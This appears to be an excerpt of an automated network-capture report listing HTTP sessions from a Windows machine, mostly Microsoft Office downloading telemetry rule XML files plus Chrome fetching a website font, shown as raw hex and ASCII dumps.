                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            81192.168.2.45775013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 491
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                            x-ms-request-id: 2398c3f1-501e-007b-7e8e-2d5ba2000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052949Z-15869dbbcc6lxrkghC1DFWp3wc00000006g000000000cas1
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            82192.168.2.45774913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                            x-ms-request-id: 26055832-201e-0096-545c-2eace6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052949Z-15869dbbcc6zbpm7hC1DFW73ew00000000z000000000fm90
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            83192.168.2.45774813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                            x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052949Z-16547b76f7f9rdn9hC1DFWfk7s0000000690000000000m6w
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            84192.168.2.45775113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                            x-ms-request-id: 1e70bdcb-401e-0029-2301-2d9b43000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052949Z-16547b76f7fp46ndhC1DFW66zg000000066g00000000dzm1
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            85192.168.2.457753162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC724OUTGET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttf HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                                            Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: font/ttf
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"361cc-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 30554
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210150-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730199368.746673,VS0,VS0,VE339
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b027dca03583-DFW
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC785INData Raw: 37 64 35 36 0d 0a 00 01 00 00 00 0f 00 80 00 03 00 70 46 46 54 4d 87 c9 44 1d 00 03 61 b0 00 00 00 1c 47 44 45 46 29 db 2d d3 00 02 21 0c 00 00 00 66 47 50 4f 53 c5 67 c5 a7 00 02 42 e0 00 01 1e ce 47 53 55 42 e4 7c ef 3e 00 02 21 74 00 00 21 6c 4f 53 2f 32 8c 53 71 09 00 00 01 78 00 00 00 60 63 6d 61 70 17 c0 cb 1b 00 00 14 94 00 00 05 1e 67 61 73 70 ff ff 00 03 00 02 21 04 00 00 00 08 67 6c 79 66 29 77 a7 fd 00 00 23 14 00 01 b1 94 68 65 61 64 0f d2 4a 09 00 00 00 fc 00 00 00 36 68 68 65 61 07 a7 07 6a 00 00 01 34 00 00 00 24 68 6d 74 78 18 75 d7 99 00 00 01 d8 00 00 12 bc 6c 6f 63 61 75 31 e2 e0 00 00 19 b4 00 00 09 60 6d 61 78 70 04 fd 00 8a 00 00 01 58 00 00 00 20 6e 61 6d 65 19 68 00 94 00 01 d4 a8 00 00 20 3d 70 6f 73 74 08 48 f1 dd 00 01 f4 e8 00
                                                                                                                                                                                                            Data Ascii: 7d56pFFTMDaGDEF)-!fGPOSgBGSUB|>!t!lOS/2Sqx`cmapgasp!glyf)w#headJ6hheaj4$hmtxulocau1`maxpX nameh =postH
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 4b 01 19 00 45 01 19 00 11 02 09 00 4a 01 1a 00 4b 03 28 00 43 02 2c 00 42 02 23 00 32 02 35 00 4b 02 35 00 37 01 5e 00 43 01 e4 00 28 01 55 00 1d 02 28 00 50 01 e3 00 0a 02 c4 00 0f 01 e7 ff fb 01 ed 00 0a 01 d5 00 28 01 66 00 19 01 0e 00 55 01 66 00 19 02 36 00 37 00 e1 00 00 01 27 00 4b 01 d7 00 37 02 50 00 2d 01 c9 00 2e 02 38 00 05 01 0e 00 55 02 32 00 2d 01 c6 00 37 03 52 00 37 01 a6 00 28 02 05 00 23 02 17 00 37 01 49 00 37 03 52 00 37 01 63 00 1e 01 93 00 23 02 05 00 37 01 80 00 2d 01 7d 00 2d 01 44 00 23 02 27 00 50 02 5f 00 23 01 1e 00 41 01 28 00 37 01 50 00 2d 01 a5 00 28 02 06 00 23 03 de 00 2d 03 d3 00 2d 04 0b 00 2d 01 d7 00 41 02 4b 00 03 02 4b 00 03 02 4b 00 03 02 4b 00 03 02 4b 00 03 02 4b 00 03 03 55 ff f1 02 41 00 37 01 fd 00 55 01 fd
                                                                                                                                                                                                            Data Ascii: KEJK(C,B#25K57^C(U(P(fUf67'K7P-.8U2-7R7(#7I7R7c#7-}-D#'P_#A(7P-(#---AKKKKKKUA7U
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 02 20 00 50 02 3a 00 37 02 46 00 52 01 f1 ff fe 02 20 00 31 01 fe 00 36 01 d3 00 37 02 2c 00 42 02 2d 00 3a 01 18 00 4b 02 02 00 4b 01 f8 00 11 02 27 00 50 01 e3 00 0a 01 eb 00 36 02 23 00 32 02 31 00 23 02 16 00 39 01 d2 00 37 02 2d 00 32 01 9e 00 0f 02 20 00 50 02 b0 00 31 01 e7 ff fb 02 a7 00 45 02 b5 00 31 01 18 ff ec 02 20 00 50 02 23 00 32 02 20 00 55 02 b5 00 36 02 46 00 45 02 38 00 32 01 f4 ff f1 01 f4 ff 18 01 f4 ff f1 02 ab 00 31 01 fd 00 55 01 fd 00 55 02 9d ff fb 01 ad 00 54 02 59 00 37 02 55 00 32 01 20 00 55 01 20 ff e4 01 25 ff fc 03 8f ff fb 03 af 00 55 02 97 ff fb 02 6c 00 55 02 8f 00 55 02 11 ff fb 02 71 00 55 02 4b 00 03 02 61 00 55 02 63 00 55 01 ad 00 54 02 86 00 0a 01 fd 00 55 03 85 00 14 02 32 00 23 02 8f 00 55 02 8f 00 55 02 6c 00
                                                                                                                                                                                                            Data Ascii: P:7FR 167,B-:KK'P6#21#97-2 P1E1 P#2 U6FE821UUTY7U2 U %UlUUqUKaUcUTU2#UUl
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 38 00 32 01 d7 00 37 02 50 00 2d 01 c9 00 2e 02 38 00 05 02 7d 00 2d 02 4d 00 2b 01 e4 00 14 02 35 00 06 02 6e 00 3d 02 3a 00 36 02 3a 00 70 02 3a 00 40 02 3a 00 3f 02 3a 00 2f 02 3a 00 55 02 3a 00 34 02 3a 00 42 02 3a 00 29 02 3a 00 36 02 6e 00 78 02 6e 00 44 02 6e 00 85 02 6e 00 20 02 3a 00 00 02 6e 00 20 02 6e 00 3b 02 3a 00 2d 02 3a 00 12 03 8c 00 5f 04 be 00 5f 02 da 00 5f 03 e8 00 32 02 0a 00 03 02 42 00 5f 02 15 00 41 02 53 00 5f 01 ed 00 5f 01 c6 00 5f 02 65 00 41 02 5b 00 5f 01 32 00 5f 01 2f 00 0a 02 35 00 5f 01 b1 00 5f 03 03 00 4b 02 5d 00 5f 02 83 00 41 02 19 00 5f 02 83 00 41 02 25 00 5f 02 28 00 32 01 ca 00 14 02 5f 00 5a 01 fd ff fb 02 df 00 0a 01 f1 ff fb 01 d6 ff f1 02 00 00 37 03 03 00 4b 04 50 00 32 02 0a 00 03 02 0a 00 03 02 0a 00 03
                                                                                                                                                                                                            Data Ascii: 827P-.8}-M+5n=:6:p:@:?:/:U:4:B:):6nxnDnn :n n;:-:___2B_AS___eA[_2_/5__K]_A_A%_(2_Z7KP2
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 00 5d 03 e6 00 5d 03 e6 00 5d 01 f4 ff 18 01 f4 ff f1 01 f4 ff f1 02 46 00 45 02 38 00 32 02 ab 00 31 01 f4 ff f1 01 c8 ff fb 01 c8 ff fb 01 c8 ff fb 01 c8 ff fb 02 d7 00 0f 04 09 00 14 05 0f 00 14 03 fe 00 37 04 05 00 37 03 d0 00 37 02 e1 00 37 03 34 00 37 00 e1 ff e8 00 01 ff f0 00 01 ff f7 00 01 00 3d 00 01 fe 93 00 01 fe 72 00 01 ff 66 01 24 00 42 01 24 00 44 02 3a 00 7c 02 62 00 a2 02 8f 00 ac 01 24 00 42 03 66 00 26 02 59 00 26 03 69 00 26 03 7a 00 26 03 64 00 26 03 b0 00 26 03 6d 00 26 02 44 00 26 02 4d 00 26 03 38 00 26 02 83 00 26 03 60 00 26 03 34 00 26 04 15 00 26 03 3e 00 26 03 44 00 4b 02 23 00 70 02 23 00 63 01 63 00 1e 02 23 00 a1 02 23 00 61 01 d5 00 32 01 8c 00 17 00 d8 00 23 02 0d 00 9f 02 23 00 5c 01 cf 00 23 02 23 00 63 03 8a 00 37 04
                                                                                                                                                                                                            Data Ascii: ]]]FE821777747=rf$B$D:|b$Bf&Y&i&z&d&&m&D&M&8&&`&4&&>&DK#p#cc##a2##\##c7
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 4f 00 50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00 58 00 59 00 5a 00 5b 00 5c 00 5d 00 5e 00 5f 00 60 00 61 00 62 00 00 00 87 00 88 00 8a 00 8c 00 94 00 99 00 9f 00 a4 00 a3 00 a5 00 a7 00 a6 00 a8 00 aa 00 ac 00 ab 00 ad 00 ae 00 b0 00 af 00 b1 00 b2 00 b4 00 b6 00 b5 00 b7 00 b9 00 b8 00 bd 00 bc 00 be 00 bf 02 67 00 73 00 65 00 66 00 6a 02 69 00 79 00 a2 00 71 00 6c 02 86 00 77 00 6b 02 ab 00 89 00 9b 02 a8 00 74 02 ac 02 ad 00 68 00 78 02 a1 02 a4 02 a3 01 b3 02 a9 00 6d 00 7d 01 9c 00 a9 00 bb 00 82 00 64 00 6f 02 a7 01 44 02 aa 02 a2 00 6e 00 7e 02 6a 00 63 00 83 00 86 00 98 01 15 01 16 02 5e 02 5f 02 64 02 65 02 61 02 62 00 ba 02 b5 00 c2 01 3b 02 6e 02 80 02 6c 02 6d
                                                                                                                                                                                                            Data Ascii: BCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abgsefjiyqlwkthxm}doDn~jc^_deab;nlm
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 5a ec 5a fe 5b 2a 5b 78 5b 9a 5b b2 5b d4 5b ee 5c 0c 5c 34 5c 62 5c 88 5c c6 5c fc 5d 42 5d 76 5d b8 5d fc 5e 14 5e 52 5e 88 5e a4 5e c6 5e ec 5f 38 5f 68 5f 9a 5f ee 60 18 60 5c 60 72 60 9e 60 ce 60 f4 61 1e 61 4e 61 74 61 84 61 96 61 b0 61 c8 62 62 62 f4 63 42 63 8a 63 e2 64 38 64 54 64 6e 64 8a 64 a8 64 ca 64 f0 65 10 65 38 65 5e 65 84 65 ac 65 d6 65 f8 66 24 66 30 66 42 66 74 66 a0 66 c8 66 f0 67 16 67 40 67 74 67 a6 67 e0 68 18 68 52 68 8a 68 d4 69 1c 69 42 69 70 69 d6 69 fa 6a 2c 6a 2c 6a 2c 6a 2c 6a 3a 6a 48 6a 56 6a 74 6a 94 6a b2 6a f0 6b 28 6b 5e 6b 74 6b 92 6b a4 6b d8 6c 3c 6c 4e 6c 60 6c 70 6c 9a 6c d2 6c fc 6d 2e 6d 4e 6d 8e 6d c4 6d ee 6e 06 6e 32 6e 68 6e 9e 6e c8 6e fa 6f 1a 6f 5a 6f 90 6f ce 70 0e 70 28 70 58 70 b4 70 f2 71 1c 71 4e 71
                                                                                                                                                                                                            Data Ascii: ZZ[*[x[[[[\\4\b\\\]B]v]]^^R^^^^_8_h__``\`r```aaNataaaabbbcBccd8dTdnddddee8e^eeeef$f0fBftfffgg@gtgghhRhhiiBipiij,j,j,j,j:jHjVjtjjjk(k^ktkkkl<lNl`lplllm.mNmmmnn2nhnnnooZoopp(pXppqqNq
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 07 00 00 33 11 21 11 25 21 11 21 42 01 a8 fe 8a 01 44 fe bc 02 b4 fd 4c 32 02 50 00 02 00 4b ff f6 00 dd 02 c2 00 03 00 0f 00 00 13 03 23 03 13 14 06 23 22 26 35 34 36 33 32 16 d5 18 54 19 8d 2c 1e 1f 29 2a 1f 1e 2b 02 c2 fe 12 01 db fd 91 1f 2b 2b 1f 1e 2b 2b 00 02 00 4b 01 ba 01 7a 02 c5 00 03 00 07 00 00 01 23 11 33 03 23 11 33 01 7a 66 66 c9 66 66 01 ba 01 0b fe f5 01 0b 00 00 02 00 23 00 00 02 13 02 c4 00 1b 00 1f 00 00 01 23 07 33 15 23 07 23 37 23 07 23 37 23 35 33 37 23 35 33 37 33 07 33 37 33 07 33 07 23 07 33 02 13 64 14 5a 64 1d 53 1d 70 1d 52 1c 58 63 13 59 64 1c 53 1d 70 1d 52 1c 5a b7 70 14 71 01 a9 8d 4d cf cf cf cf 4d 8d 4d ce ce ce ce 4d 8d 00 00 01 00 2d ff 9d 02 20 03 11 00 29 00 00 25 14 06 07 15 23 35 26 27 37 16 33 32 36 35 34 2f 01
                                                                                                                                                                                                            Data Ascii: 3!%!!BDL2PK##"&54632T,)*+++++Kz#3#3zffff##3##7##7#537#53733733#3dZdSpRXcYdSpRZpqMMMM- )%#5&'732654/
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 32 31 46 40 1a 0d 01 58 03 5b 29 31 37 41 27 2b 5f 49 6d 28 13 50 00 01 00 23 ff 45 01 fe 02 0b 00 27 00 00 25 23 22 2f 01 16 1d 01 07 35 34 36 35 07 22 23 21 35 13 33 03 06 07 36 3b 01 32 16 33 26 3f 02 15 14 07 32 36 3b 01 01 fe 2f 08 0b 0c 04 69 01 0e 0e 09 fe fc cd 73 a0 16 18 0c 13 78 06 1b 02 05 0c 08 56 03 01 1a 07 2b 08 01 01 0c 18 8f 12 a4 06 19 01 01 4e 01 b5 fe aa 30 24 03 01 25 7e 58 15 b9 42 15 01 00 01 00 37 ff 47 01 c7 01 fa 00 19 00 00 25 14 06 23 22 2f 01 16 33 32 36 35 34 26 23 22 07 13 21 07 23 07 36 33 32 16 01 c7 ad 82 29 21 17 2d 28 55 6f 45 39 3f 4a 20 01 40 10 cb 0f 23 16 5b 74 3f 6d 8b 08 50 0d 5d 46 36 3f 19 01 69 5d a3 05 69 00 00 00 02 00 3c ff f1 02 0e 02 c6 00 14 00 21 00 00 25 14 06 23 22 26 35 34 36 37 36 37 17 06 07 06 07
                                                                                                                                                                                                            Data Ascii: 21F@X[)17A'+_Im(P#E'%#"/5465"#!536;23&?26;/isxV+N0$%~XB7G%#"/32654&#"!#632)!-(UoE9?J @#[t?mP]F6?i]i<!%#"&546767
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: b4 0e 14 32 56 38 4f 10 13 60 31 25 38 08 06 db 3e 01 5b 1e 2f 09 08 bd 0a 10 1c 00 00 00 01 00 37 ff f5 02 1e 02 c1 00 1a 00 00 25 06 23 22 27 26 35 34 37 3e 01 33 32 17 07 26 23 22 07 06 15 14 17 16 33 32 37 02 1e 50 6d 88 53 4f 2e 27 87 51 6b 41 35 35 41 5b 2f 24 1b 2d 6d 45 37 32 3d 64 60 97 7c 56 4a 55 36 4c 27 53 3f 77 71 3b 62 2c 00 02 00 55 00 00 02 40 02 b4 00 0c 00 17 00 00 01 14 07 0e 01 2b 01 11 33 32 16 17 16 07 34 27 2e 01 2b 01 11 33 32 36 02 40 49 2b 6b 61 ab 90 64 7c 30 4b 80 2c 18 3b 2f 49 4c 5a 51 01 58 9a 5d 37 2a 02 b4 2c 36 57 af 95 3c 21 1b fe 05 76 00 01 00 55 00 00 01 df 02 b4 00 0b 00 00 29 01 11 21 07 23 15 33 15 23 15 21 01 df fe 76 01 80 0f fc d3 d3 01 15 02 b4 5e bd 5f d8 00 01 00 55 00 00 01 c3 02 b4 00 09 00 00 01 07 23 15
